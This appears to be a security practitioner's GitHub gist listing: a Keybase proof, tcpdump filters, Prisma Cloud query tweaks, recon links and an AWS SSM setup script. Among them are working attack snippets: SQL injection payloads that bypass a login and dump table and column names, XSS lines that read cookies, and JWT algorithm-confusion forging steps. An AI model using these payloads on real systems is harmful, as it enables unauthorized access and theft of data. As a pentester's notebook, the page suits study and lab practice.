I hereby claim:
- I am dustinbutterworth on github.
- I am dbutterworth (https://keybase.io/dbutterworth) on keybase.
- I have a public key ASDCBDTBXEIX_HgXk-xsI8G_3L-KQg_US9lhdLCn44qDrgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# TCP Dump for HTTP GET including request/response headers and body: | |
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | |
# TCP Dump for HTTP POST including request/response headers and body: | |
tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' |
# If you want to tag something so that Prisma Cloud doesn't alert on it if the tag contains a certain string value | |
# And you want to continue alerting if something does not have this specific tag at all, tag this onto your already existing query: | |
and ((tags[?(@.key=='PrismaCloudMonitored' && @.value!='no')] size > 0) or (tags[*].key does not contain PrismaCloudMonitored)) | |
# If you don't want prisma cloud to alert on SQL Express, since you can't encrypt SQL express: | |
json.rule="(engine does not contain 'sqlserver-ex') and (dbiResourceId does not equal null and storageEncrypted is false)" |
username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1 | |
password=butters | |
username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
shows table name admin | |
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
gives id row | |
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
gives username row |
# -*- coding: utf-8 -*- | |
import requests | |
import time | |
import os | |
import json | |
import sys | |
headers = { | |
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0', | |
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', |
// Show hostname | |
window.location.hostname | |
// show cookie | |
document.cookie | |
// background color | |
document.body.style.backgroundColor = "red" | |
// IP and Port Scan with javascript - XSS Playground |
# convert public key to hex so openssl will use it | |
cat $FILE | xxd -p | tr -d "\\n" | |
# openssl to sign as a valid HS256 | |
echo -n "$JWT" | openssl dgst -sha256 -mac HMAC -macopt hexkey:$HEX_OF_PUBLIC_KEY | |
# decode hex to binary data then reencode it in base64 | |
#!/usr/bin/env python3 | |
import base64, binascii |
curl -s http://mirror.centos.org/centos/7/os/x86_64/Packages/ | grep ipa-client | cut -d '"' -f 12 |
Credit to @fuxksniper (https://twitter.com/fuxksniper/status/1290710096524144640): | |
http://grep.app | |
http://hunter.io | |
https://cxsecurity.com | |
https://exploit.in | |
https://xposedornot.com/phpvatch/ | |
https://gcc.godbolt.org | |
https://2018.zeronights.ru/en/materials/ | |
https://openpentest.com/find-subdomains |
#!/usr/bin/env bash | |
instance_id="i-***************" | |
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" | |
unzip awscliv2.zip | |
sudo ./aws/install | |
curl "https://s3.amazonaws.com/session-manager-downloads/plugin/latest/linux_64bit/session-manager-plugin.rpm" -o "session-manager-plugin.rpm" | |
sudo yum install session-manager-plugin.rpm -y | |
/usr/local/bin/aws ssm start-session --target $instance_id | |
#Cleanup |